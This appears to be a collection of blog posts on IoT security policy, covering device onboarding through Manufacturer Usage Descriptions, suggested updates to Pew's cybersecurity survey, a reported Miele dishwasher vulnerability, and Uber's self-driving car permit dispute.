Addressing the Department Gap in IoT Security

People in departments outside of IT aren’t paid to understand IT security. In the world of IoT, we need to make it easy for those people to do the right thing.

So, Mr. IT professional, you suffer from your colleagues at work connecting all sorts of crap to your network that you’ve never heard of?  You’re not alone.  As more and more devices hit the network, the ability to maintain control can often prove challenging.  Here are your choices for dealing with miscreant devices:

  1. Prohibit them and enforce the prohibition by firing anyone who attaches an unauthorized device.
  2. Allow them and suffer.
  3. Prohibit them but not enforce the prohibition.
  4. Provide an onboarding and approval process.

A bunch of companies I work with generally aim for 1 and end up with 3.  A bunch of administrators recognize the situation and fit into 2.  Everyone I talk to wants to find a way to scale 4, but nobody has, as of yet.  What does 4 involve?  Today, it means an IT person researching a given device, determining what networking requirements it has, creating firewall rules, and some associated policies, and establishing an approval mechanism for a device to connect.

This problem is exacerbated by the fact that many different enterprise departments have wide and varied needs, and the network stands as critical to many of them.  Furthermore, very few of those departments reports through the chief information officer, and chief information security officers often lack the attention their concerns receive.

I would claim that the problem is that incentives are not well aligned, were people in other departments even aware of the IT person’s concerns in the first place, and often they are not.  The person responsible for providing vending machines just wants to get the vending machines hooked up, while the person in charge of facilities just wants the lights to come on and the temperature to be correct.

What we know from hard experience is that the best way to address this sort of misalignment is to make it easy for everyone to do the right thing. What, then, is the right thing?

Prerequisites

It has been important pretty much forever for enterprises to be able to maintain an inventory of devices that connect to their networks.  This can be tied into the DHCP infrastructure or to the device authentication infrastructure.  Many such systems exist, the simplest of which is Active Directory.  Some are passive and snoop the network.  The key point is simply this: you can’t authorize a system if you can’t remember it.  In order to remember it, the device itself needs to have some sort of unique identifier.  In the simplest case, this is a MAC address.

Ask device manufacturers to help

Manufacturers need to make your life easier by providing you a description what the device’s communication requirements are.  The best way to do this is with Manufacturer Usage Descriptions (MUD).  When MUD is used, your network management system can retrieve a recommendation from the manufacturer, and then you can approve, modify, or refuse a policy.  By doing this, you don’t have to go searching all over random web sites.

Have a simple and accessible user interface for people to use

Once in place you now have a nice system that encourages the right thing to happen, without other departments having to do anything other than to identify the devices they want to connect.  That could be as simple as a picture of a QR code or otherwise entering a serial #.  The easier we can make it for people who know nothing about networking, the better all our lives will be.

Pew should evolve its cybersecurity survey

Pew should evolve the questions they are asking and the advice they are giving based on how the threat environment is changing. But they should keep asking.

Last year, Pew Research surveyed just over 1,000 people to try to get a feel for how informed they are about cybersecurity.  That’s a great idea because it informs us as a society as to how well consumers are able to defend themselves against common attacks.   Let’s consider some ways that this survey could be evolved, and how consumers can mitigate certain common risks.  Keep in mind that Pew conducted the survey in June of last year in a fast changing world.

Several of the questions related to phishing, Wifi access points and VPNs.  VPNs have been in the news recently because of the Trump administration’s and Congress’  backtracking on privacy protections.  While privacy invasion by service providers is a serious problem, accessing one’s bank at an open access point is probably considerably less so.  There are two reasons for this.  First, banks almost all make use of TLS to protect communications.  Attempts to fake bank sites by intercepting communications will, at the very least produce a warning that browser manufacturers have made increasingly difficult to bypass.  Second, many financial institutions make use of apps in mobile devices that take some care to validate that the user is actually talking to their service.  In this way, these apps actually mark a significant reduction in phishing risk.  Yes, the implication is that using a laptop with a web browser is a slightly riskier means to access your bank than the app it likely provides, and yes, there’s a question hiding there for Pew in its survey.

Another question on the survey refers to password quality.  While this is something of a problem, there are two bigger problems hiding that consumers should understand:

  • Reuse of passwords.  Consumers will often reuse passwords simply because it’s hard to remember many of them.  Worse, many password managers themselves have had vulnerabilities.  Why not?  It’s like the apocryphal Willie Sutton quote about robbing banks because that’s where the money is.  Still, with numerous break-ins, such as those that occurred with Yahoo! last year*, and the others that have surely gone unreported or unnoticed, re-use of passwords is a very dangerous practice.
  • Aggregation of trust in smart phones.  As recent articles about American Customs and Border Patrol demanding access to smart phones demonstrate, access to many services such as Facebook, Twitter, and email can be gained just by gaining access to the phone.  Worse, because SMS and email are often used to reset user passwords, access to the phone itself typically means easy access to most consumer services.

One final area that requires coverage: as the two followers of my blog are keenly aware, IoT presents a whole new class of risk that Pew has yet to address in its survey.

The risks I mention were not well understood as early as five years ago.  But now they are, and they have been for at least the last several years.  Pew should keep surveying, and keep informing everyone, but they should also evolve the questions they are asking and the advice they are giving.


* Those who show disdain toward Yahoo! may find they themselves live in an enormous glass house.

Yet another IoT bug

Miele could have benefited from MUD, as well as the experience of the Internet security community.

The Register is reporting a new IoT bug involving Miele PG 8528 professional dishwashers, used in hospitals and elsewhere.  In this case, it is a directory traversal bug involving an HTTP server that resides on port 80.  In all likelihood, the most harm this vulnerability will directly cause is that the dishwasher would run when it shouldn’t.  However, the indirect risk is that the device could be used to exfiltrate private information about patients and staff.  The vulnerability is reported here.

Manufacturers expect that it will be very simple to provide Internet services on their devices.  To them, initially, they think that it’s fine to slap a transceiver and a simple stack on a device and they’re finished.  They’re not.  They need to correct vulnerabilities such as this one.  They apparently have no mechanism to do so.  Manufacturers such as Miele are experts within their domains, such as building dishwashers.  They are not experts in Internet security.  It is a new world when these two domains intersect.

We need MUD

And yes, Manufacturer Usage Descriptions would have helped here, by restricting communication either to all local devices or to specifically authorized devices.

MUD sliding along

Your chance to try and chime in on Manufacturer Usage Descriptions, a way to protect IoT devices.

You may recall that I am working on a mechanism known as Manufacturer Usage Descriptions (MUD).  This is the system by which manufacturers can inform the network about how best to protect their products.  The draft for this work is now about to enter “working group last call” at the IETF.  This means that now would be a very good time for people to chime in with their views on the subject.

In the meantime, MUD Maker has also been coming along. This is a tool that generates manufacturer usage descriptions.  You can find the tool here.

MUD isn’t meant to be the whole enchilada of IoT security.  Other tools are needed to authenticate devices onto the network, and to securely update them.  And manufacturers have to take seriously not only their customers’ needs, but what risk they may impose on others, as Mirai reminded us.  Had MUD been around at the time, it’s possible that Mirai would not have happened.

Should Uber require a permit for testing?

The Wall Street Journal and others are reporting on the ongoing battle between Uber and state and local governments.  This time it’s their self-driving car.  Uber announced last week that they would not bother to seek a permit to test their car, claiming that the law did not require one.  The conflict took on a new dimension last week when one of Uber’s test vehicles ran a red light.

Is Uber right in not wanting to seek a permit?  Both production and operation of vehicles in the nearly all markets are highly regulated.  That’s because  auto accidents are a leading cause of death in the United States and elsewhere.  The good news is that number is falling.  In part that’s due to regulation, and in part it’s due to civil liability laws.  I’m confident that Uber doesn’t want to hurt people, and that their interest is undoubtedly to put out a safe service so that their reputation doesn’t suffer and their business thrives.  But the rush to market is sometimes too alluring.  With the pace of technology being what it is, Uber and others would be in a position to flood the streets with unsafe vehicles, possibly well beyond their ability to pay out damages.  That’s when regulations are required.

There are a few hidden points in all of this:

  • As governments consider what to do about regulating the Internet of Things, they should recognize that much of the Internet of Things is already regulated.  California did the right thing by incrementally extending the California Vehicle Code to cover self-driving vehicles, rather than come up with sweeping new regulations.  Regulations already exist for many other industries, including trains, planes, automobiles, healthcare, electrical plants.
  • We do not yet have a full understanding of the risks involved with self-driving cars.  There are probably many parts of the vehicle code that require revision.  By taking the incremental approach, we’ve learned, for instance, that there are places where the vehicle code might need a freshening up.  For instance, self-driving cars seem to be following the law, and yet causing problems for some bicyclists.
  • IoT regulation is today based on traditionally regulated markets.  This doesn’t take into account the full nature of the Internet, and what externalities people are exposed to as new products rapidly hit the markets.  This means, to me, that we will likely need some form of regulation over time.  There is not yet a regulation that would have prevented the Mirai attack.  Rather than fight all regulation as Uber does, it may be better to articulate the right principles to apply.  One of those is that there has to be a best practice.  In the case of automobiles, the usual test for the roads is this is whether the feature will make things more or less safe than the status quo.  California’s approach is to let developers experiment under limited conditions in order to determine an answer.

None of this gets to my favorite part, which is whether Uber’s service can be hacked to cause chaos on the roads.  Should that be tested in advance?  And if so how?  What are the best practices Uber should be following in this context?  Some exist.

More on this over time.